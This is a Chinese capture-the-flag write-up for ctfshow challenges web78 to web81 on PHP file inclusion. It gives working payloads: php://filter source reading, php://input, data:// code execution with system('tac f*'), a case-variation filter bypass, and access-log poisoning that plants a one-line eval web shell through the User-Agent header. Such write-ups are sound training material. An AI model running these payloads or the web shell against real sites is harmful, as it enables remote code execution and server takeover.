目录
web78
方法一:filter伪协议
方法二:input协议
方法三:data协议
web79
方法一:input协议
方法二:data协议
web80
方法一:input协议
方法二:日志包含getshell
web81
web78
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
include函数执行file引入的文件,如果执行不成功,就高亮显示当前页面的源码。
可知这就是一个没有任何过滤的文件包含的题目。
方法一:filter伪协议
file关键字的get参数传递,php://是一种协议名称,php://filter/是一种访问本地文件的协议,/read=convert.base64-encode/表示读取的方式是base64编码后,resource=index.php表示目标文件为index.php。
filter伪协议构造payload
?file=php://filter/read=convert.base64-encode/resource=flag.php
得到base编码后的flag解密得到flag
方法二:input协议
php://input 是 PHP 提供的一个伪协议,允许开发者 访问 POST 请求的原始内容。对于 POST 请求数据,PHP 提供了 $_POST 与 $FILES 超全局变量,在客户端发起 POST 请求时,PHP 将自动处理 POST 提交的数据并将处理结果存放至 $_POST 与 $FILES 中。
方法三:data协议
data也是利用文件包含漏洞,将输入的代码当作php文件执行。
data协议格式:
data://[<MIME-type>][;charset=<encoding>][;base64],<data>
构造payload:
?file=data://text/plain,<?php system('tac f*');?>
将我们输入的<?php system('tac f*');?>当作php文件来执行,以达到读取flag的目的。
web79
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
可以看到在上一道题的基础上,增加了对php字符串的过滤,但是值得注意的是,过滤是区分了大小写的,这就意味着,可以使用大小写绕过,但是这里的大小写绕过对input和data协议有用,对filter协议没有用。
方法一:input协议
将php改为Php
方法二:data协议
?file=data://text/plain,<?Php system('tac f*');?>
这里要将php改为大写的,但是上面的input协议就不用,这是因为我们的参数file是通过get方式传参的,str_replace函数检查也只是检查get方式传入的值,input协议中的php是通过post方式传参的,因此不用改,data协议的php是get方式传入的,于是需要大小写绕过。
web80
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
新增了对data的过滤,对data尝试了大小写绕过,发现绕过不了,于是data协议用不了,就只能用input协议了。
方法一:input协议
方法二:日志包含getshell
在了解过后,发现这道题还可以通过日志包含getshell的方法来做。
日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。
首先要判断网站使用的什么服务:
对于Apache,日志存放路径:/var/log/apache/access.log
对于Ngnix,日志存放路径:/var/log/nginx/access.log 和 /var/log/nginx/error.log
查看web服务:
于是我们访问日志:
?file=/var/log/nginx/access.log
在user-agent添加木马
<?php @eval($_REQUEST['cmd']);?>
post传参,首先查看列表
cmd=system('ls');
可以看到目录下面有flag,直接cat查看
cmd=system('tac f*');
得到flag。
web81
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
过滤了冒号,伪协议不好用了,于是,这个题还是用web80的getshell方法,得到flag
ctfshow{333cb693-64d5-4c3e-b564-6fddb4621e1e}